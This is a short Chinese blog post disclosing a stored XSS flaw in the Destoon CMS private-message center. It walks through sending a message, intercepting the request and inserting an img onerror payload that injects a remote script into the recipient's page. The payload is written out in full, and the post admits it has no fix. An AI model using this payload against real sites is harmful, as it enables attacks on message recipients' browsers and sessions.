destoon新版短消息中心xss指谁打谁 – 网站安全

首先选取一个对象我们去发消息 destoon新版短消息中心xss指谁打谁 – 网站安全 – 自插图

然后抓包，往里面填充我们的xss代码 destoon新版短消息中心xss指谁打谁 – 网站安全 – 自插图1

其中的xss <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='xsscode';> 然后我们来试着点开该信息，审查元素，代码完好 destoon新版短消息中心xss指谁打谁 – 网站安全 – 自插图2

看网络连接，加载成功了

destoon新版短消息中心xss指谁打谁 – 网站安全 – 自插图3
修复方案： 表示不知道...

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了，原文地址《destoon新版短消息中心xss指谁打谁 – 网站安全 – 自》